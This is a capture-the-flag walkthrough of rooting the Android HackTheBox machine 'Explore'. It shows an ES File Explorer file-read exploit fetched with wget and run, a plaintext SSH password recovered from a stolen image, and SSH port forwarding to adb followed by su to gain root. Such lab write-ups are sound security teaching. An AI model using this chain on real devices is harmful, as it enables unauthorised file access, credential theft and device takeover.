Explore HackTheBox WalkThrough
This is Explore HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Explore HackTheBox
machine. Before starting let us know something about this box. It is an Android OS
box with IP address 10.10.10.247
and difficulty level Easy
assigned by its maker.
First of all, connect your PC with HackTheBox VPN
and make sure your connectivity with Explore
machine by pinging its IP 10.10.10.247. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used nmap for this task and the result is given below: –
Scanning
$ sudo nmap -sT -T4 -sV -p- -oN explore-all-tcp.nmap --min-rate=1000 10.10.10.247

Full TCP port scan revealed 4 ports as open. SSH server
on 2222
, ES File Explorer
on 42135
, Bukkit JSONAPI
web server on 59777
and an unknown service is running on port 33483
. A quick googling on ES File explorer exploit
revealed that ES File Explorer on Android is vulnerable to Arbitrary File Read vulnerability
. For more info about this vulnerability check this link. You can either use previous link to download exploit code or use this link, all are same. Here is the snippet of the exploit.

Using this exploit I could read many files of the Explore machine. When I tried to list all the pics in the android phone, I found a pic named creds.jpg
. According to its name it may contains some type of credential. Then I tried to download this pic using the exploit itself but it gave me error You need to provide full path of the file
. After trying few more times when I could not able to download it, I tried to access the file using web browser. And the file can be accessed through it. Inside that file [pic] there is a hand written credential present. I followed the given steps to access the file.
Downloading & Executing Exploit
$ wget https://dl.packetstormsecurity.net/2106-exploits/esfileexplorer41974-fileread.txt
$ mv esfileexplorer41974-fileread.txt exploit.py
$ python3 exploit.py listPics 10.10.10.247
$ curl http://10.10.10.247:59777/storage/emulated/0/DCIM/creds.jpg -O
$ firefox creds.jpg


The extracted credential from the file is kristi
: Kr1sT!5h@Rp3xPl0r3!
Getting User Shell
Let us use grabbed credential to login into Kristi’s SSH account.
$ ssh [email protected] -p 2222
~ Kr1sT!5h@Rp3xPl0r3!
$ whoami && id

We are successfully logged into kristi’s SSH account. Let us capture user flag.
Capture User Flag
$ cat /sdcard/user.txt

Privilege Escalation
To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can use some post exploitation enumeration script for this task. Check this link if you need more information about a bunch of post exploitation tools.
Finding PrivEsc Vector
$ ss -lnpt
Command revealed that port 5555
is open and listening locally.

Then I checked which process is running on this port and which user is executing this process. If this will be executed by root
or some well-known user
then we should definitely have a look on it. Generally, on android port 5555
is used by adb
so I checked the running processes and it revealed that adb is being executed by user shell
.
$ ps -ef | grep -i adb

A quick googling on adb privilege escalation
gave this ppt. According to this ppt we can perform privilege escalation only when we will be logged in as user shell
. But currently we are logged in as user u0_a76
. We have to anyhow login as user shell
to perform privilege escalation. When I logged in as user shell then I could perform privilege escalation very easily. So here our potential PrivEsc vector is Privilege Escalation by exploiting adb
[Android Debug Bridge].
Local Port Forwarding
Since adbd
service is running locally as user shell
we can access this service on our Kali machine by forwarding port 5555
to our Kali machine. Therefore, to access adb I forwarded port 5555 locally to my kali machine through local port forwarding
. Now we can see the forwarded port on our Kali machine using $ ss -lnpt
command.
$ ssh -L 5555:127.0.0.1:5555 [email protected] -p 2222
Password authentication
Password: Kr1sT!5h@Rp3xPl0r3!
$ ss -lnpt

Getting Root Shell
Once we can access adb service locally then we can easily connect to it and perform privilege escalation. To perform privilege escalation I followed the given steps.
$ adb connect 127.0.0.1
$ adb devices
$ adb shell
$ su
# whoami && id

We have successfully got root shell. Let us capture root flag.
Capture Root Flag
# find / -user "root" -type f -name "root.txt" 2>/dev/null
# cat /data/root.txt

This was how I rooted Explore HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected].